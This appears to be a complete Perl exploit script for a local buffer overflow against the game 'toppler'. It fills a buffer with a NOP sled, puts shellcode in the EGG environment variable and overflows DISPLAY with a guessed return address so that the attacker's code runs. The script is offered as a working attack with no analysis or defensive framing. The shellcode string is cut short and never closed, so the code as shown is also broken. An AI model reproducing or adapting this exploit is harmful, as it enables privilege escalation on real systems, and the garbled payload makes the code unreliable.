#!/usr/bin/perl
#kokanin@dtors.net playing a game
#hi bob
$len = 1024;
$ret = 0xbfbffd31;
$nop = "\x90";
$offset = 0;
$shellcode = "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xD9\x9d;

if (@ARGV == 1) {
    $offset = $ARGV[0];
}
  
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}
 
$buffer .= $shellcode;

$new_ret = pack('l', ($ret + $offset));
 
for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}

local($ENV{'EGG'}) = $buffer; 
local($ENV{'DISPLAY'}) = $new_ret x 64; 

exec("toppler 2>/dev/null");